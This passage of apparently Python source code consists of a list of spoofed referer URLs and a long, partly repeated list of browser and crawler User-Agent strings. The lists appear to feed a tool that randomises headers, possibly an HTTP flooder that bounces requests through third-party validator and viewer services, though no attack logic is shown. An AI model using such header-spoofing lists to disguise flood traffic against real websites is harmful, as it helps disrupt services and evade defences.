'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..', 'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..', '/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882', 'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..', 'http://www.google.ru/url?sa=t&rct=?j&q=&e..', 'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=', 'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=', 'http://www.ask.com/web?q=', 'http://search.aol.com/aol/search?q=', 'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=', 'https://drive.google.com/viewerng/viewer?url=', 'http://validator.w3.org/feed/check.cgi?url=', 'http://host-tracker.com/check_page/?furl=', 'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=', 'http://jigsaw.w3.org/css-validator/validator?uri=', 'https://add.my.yahoo.com/rss?url=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=', 'http://www.topsiteminecraft.com/site/pinterest.com/search?q=', 'http://eu.battle.net/wow/en/search?q=', 'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=', 'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=', 'http://www.ted.com/search?q=', 'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=', 'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=', 'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=', 'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=', 'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=', 'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=', 'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=', 'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=', 'http://ytmnd.com/search?q=', 'https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=', 'http://www.google.com/?q=', 'https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=', 'https://drive.google.com/viewerng/viewer?url=', 'http://www.google.com/translate?u=', 'https://developers.google.com/speed/pagespeed/insights/?url=', 'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=', 'https://add.my.yahoo.com/rss?url=', 'https://play.google.com/store/search?q=', 'http://www.google.com/?q=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q='] return referers def obtain_user_agents(self): user_agents = ['Mozilla/5.0 (Amiga; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14', 'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en-US; rv:1.8.1.21) Gecko/20090303 SeaMonkey/1.1.15', 'Mozilla/5.0 (AmigaOS; U; AmigaOS 1.3; en; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14', 'Mozilla/5.0 (Android 2.2; Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4', 'Mozilla/5.0 (BeOS; U; BeOS BeBox; fr; rv:1.9) Gecko/2008052906 BonEcho/2.0', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.1) Gecko/20061220 BonEcho/2.0.0.1', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.10) Gecko/20071128 BonEcho/2.0.0.10', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.17) Gecko/20080831 BonEcho/2.0.0.17', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.6) Gecko/20070731 BonEcho/2.0.0.6', 'Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC 